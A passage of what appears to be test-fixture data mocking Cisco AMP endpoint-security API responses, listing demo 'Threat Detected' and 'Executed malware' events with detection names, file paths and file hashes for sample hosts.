Detected","event_type_id":1090519054,"detection":"Eldorado:Alureon-tpd","detection_id":"5825617808351821827","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tdss.exe","file_path":"\\\\?\\C:\\Documents and Settings\\admin\\Desktop\\tdss.exe","identity":{"sha256":"b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825617808351822000,"timestamp":1610705477,"timestamp_nanoseconds":796000000,"date":"2021-01-15T10:11:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Eldorado:Alureon-tpd","detection_id":"5825617808351821828","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tdss.exe","file_path":"\\\\?\\C:\\Documents and Settings\\admin\\Desktop\\tdss.exe","identity":{"sha256":"b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825617808351822000,"timestamp":1610705477,"timestamp_nanoseconds":796000000,"date":"2021-01-15T10:11:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Eldorado:Alureon-tpd","detection_id":"5825617808351821825","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tdss.exe","file_path":"\\\\?\\C:\\Documents and Settings\\admin\\Desktop\\tdss.exe","identity":{"sha256":"b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825617808351822000,"timestamp":1610705477,"timestamp_nanoseconds":796000000,"date":"2021-01-15T10:11:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Eldorado:Alureon-tpd","detection_id":"5825617808351821826","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tdss.exe","file_path":"\\\\?\\C:\\Documents and Settings\\admin\\Desktop\\tdss.exe","identity":{"sha256":"b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257413683872000,"timestamp":1610705469,"timestamp_nanoseconds":56000000,"date":"2021-01-15T10:11:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257409388904508","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1489955900267000300,"timestamp":1610705459,"timestamp_nanoseconds":267000000,"date":"2021-01-15T10:10:59+00:00","event_type":"Executed malware","event_type_id":1107296272,"detection":"Eldorado:Alureon-tpd","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610705459,"start_date":"2021-01-15T10:10:59+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5"},"parent":{"disposition":"Clean","identity":{"sha256":"1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257357849297000,"timestamp":1610705456,"timestamp_nanoseconds":607000000,"date":"2021-01-15T10:10:56+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257357849296955","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667064295457000,"timestamp":1610705453,"timestamp_nanoseconds":478000000,"date":"2021-01-15T10:10:53+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667064295456780","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257340669428000,"timestamp":1610705452,"timestamp_nanoseconds":988000000,"date":"2021-01-15T10:10:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257340669427770","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667055705522000,"timestamp":1610705451,"timestamp_nanoseconds":565000000,"date":"2021-01-15T10:10:51+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533667055705522187","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832268414885822000,"timestamp":1610705411,"timestamp_nanoseconds":13000000,"date":"2021-01-15T10:10:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"ZBot:FakeAlert-tpd","detection_id":"5832268410590855181","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"2_3756858138.exe","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\2_3756858138.exe","identity":{"sha256":"8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a","sha1":"e0feb4af86ef2f7a82e01b8704900e1e86c9e7a5","md5":"e74f1b3fffc4ae61e077bbdec3230e95"},"parent":{"process_id":3020,"disposition":"Unknown","file_name":"a.exe","identity":{"sha256":"0723932d68702a59c4c8bf6a670a098cd55c39f4a3037fa8c2e6d2641fbfe85f","sha1":"5df10f3387f7ff512e420240f81bde68a2b4c7aa","md5":"9a2e18cb348feb772d02fb8f8728ab82"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832268410590855000,"timestamp":1610705410,"timestamp_nanoseconds":810000000,"date":"2021-01-15T10:10:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"ZBot:FakeAlert-tpd","detection_id":"5832268410590855180","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"2_3756858138.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Local Settings\\Temp\\2_3756858138.exe","identity":{"sha256":"8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a","sha1":"e0feb4af86ef2f7a82e01b8704900e1e86c9e7a5","md5":"e74f1b3fffc4ae61e077bbdec3230e95"},"parent":{"process_id":3020,"disposition":"Unknown","file_name":"a.exe","identity":{"sha256":"0723932d68702a59c4c8bf6a670a098cd55c39f4a3037fa8c2e6d2641fbfe85f","sha1":"5df10f3387f7ff512e420240f81bde68a2b4c7aa","md5":"9a2e18cb348feb772d02fb8f8728ab82"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832268410590855000,"timestamp":1610705410,"timestamp_nanoseconds":779000000,"date":"2021-01-15T10:10:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"ZBot:FakeAlert-tpd","detection_id":"5832268410590855179","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"2_3756858138","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Local Settings\\Temp\\2_3756858138","identity":{"sha256":"8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a"},"parent":{"process_id":3020,"disposition":"Unknown","file_name":"a.exe","identity":{"sha256":"0723932d68702a59c4c8bf6a670a098cd55c39f4a3037fa8c2e6d2641fbfe85f","sha1":"5df10f3387f7ff512e420240f81bde68a2b4c7aa","md5":"9a2e18cb348feb772d02fb8f8728ab82"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257087266357000,"timestamp":1610705393,"timestamp_nanoseconds":942000000,"date":"2021-01-15T10:09:53+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257087266357305","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533666798007484000,"timestamp":1610705391,"timestamp_nanoseconds":469000000,"date":"2021-01-15T10:09:51+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533666798007484426","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533666798007484000,"timestamp":1610705391,"timestamp_nanoseconds":344000000,"date":"2021-01-15T10:09:51+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533666798007484425","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533666793712517000,"timestamp":1610705390,"timestamp_nanoseconds":948000000,"date":"2021-01-15T10:09:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533666793712517128","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533666785122583000,"timestamp":1610705388,"timestamp_nanoseconds":372000000,"date":"2021-01-15T10:09:48+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533666785122582535","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"},"parent":{"process_id":596,"disposition":"Clean","file_name":"rundll32.exe","identity":{"sha256":"5ad3c37e6f2b9db3ee8b5aeedc474645de90c66e3d95f8620c48102f1eba4124","sha1":"8939cf35447b22dd2c6e6f443446acc1bf986d58","md5":"51138beea3e2c21ec44d0932c71762a8"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257040021717000,"timestamp":1610705382,"timestamp_nanoseconds":304000000,"date":"2021-01-15T10:09:42+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257040021717048","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256988482109000,"timestamp":1610705370,"timestamp_nanoseconds":292000000,"date":"2021-01-15T10:09:30+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256988482109495","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533666703518204000,"timestamp":1610705369,"timestamp_nanoseconds":782000000,"date":"2021-01-15T10:09:29+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533666703518203910","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533666703518204000,"timestamp":1610705369,"timestamp_nanoseconds":649000000,"date":"2021-01-15T10:09:29+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533666703518203909","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} 